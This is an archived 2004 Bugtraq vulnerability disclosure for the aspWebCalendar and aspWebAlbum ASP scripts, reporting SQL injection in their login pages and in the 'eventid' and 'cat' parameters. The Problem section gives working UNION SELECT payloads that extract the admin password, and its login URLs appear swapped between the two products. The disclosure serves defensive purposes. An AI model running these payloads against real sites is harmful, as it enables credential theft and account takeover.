[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    aspWebCalendar /aspWebAlbum: SQL injection
From:       Pedro Sanches <pedro_sanches () sapo ! pt>
Date:       2004-09-23 18:27:02
Message-ID: 20040923182702.17881.qmail () www ! securityfocus ! com
[Download RAW message or body]



[1]Introduction

"aspWebCalendar is an .asp (Active Server Pages) script that allows you to easily \
create an online events calendar that supports multiple users. Easy installation and \
usage are the key features of aspWebCalendar. The script contains a text file with a \
few configuration variables that are used by the script... Just change one of these \
variables, upload the files and you are up and running."

"aspWebAlbum is an .asp (Active Server Pages) script that allows you to easily create \
an online photo album or gallery simply by uploading images to your server... the \
script will do the rest. Easy installation and usage are the key features of \
aspWebAlbum. The script contains a text file with several configuration variables \
that are used by the script... just change two of these and you are up and running. \
To add images simply upload them to your server, its that simple."

This information was taken from http://www.jancw.dk/ but the vendor of this software \
is Full Revolution and the website can be found at www.fullrevolution.com


[2]The Problem

These two can run on SQL or Access databases, both coming right from the box, and \
those who use the default sql file are vulnerable to injection, alowing, f.e., an \
attacker to view the table contents by reading the asp error messages. 

(1) For the aspWebCalendar, in the login pages: 

"www.example.com/album.asp?action=login"

you can put this in the username field (leaving the password blank) to extract the \
password for the 'admin' user, if it exists:

"  ' union select Cal_User_Password,1,1,1,1,1,1,1,1,1 from Cal_User where \
Cal_User_UserName = 'admin'--  "

 
  (1.1) the 'eventid' field is vulnerable to sql injection too:
	"www.example.com/calendar.asp?action=eventdetail&eventid='"



(2) For the aspWebAlbum, the login pages can be found at \
"www.example.com/calendar.asp?action=login" and the problem is the same (i'll use the \
same example as above) :

	"' union select Gal_UserPassword,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from Gal_Users where \
Gal_UserUserName = 'admin' --"

	
	(2.2) The 'cat' field is also a problem in this example:
	     "www.example.com/album.asp?cat='"


At the moment all the SQL versions of this software seem to be affected.


[3]Timeline

(28/8/2004) vuln discovered
(29/8/2004) short note posted at johnny.ihackstuff.com forums
(15/9/2004) vendor notified, still no reply


[4]Feedback

cybercide@megamail.pt

(This is my first vulnerability disclosure so if there's a mistake here don't hurt me \
too much :-) )


[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic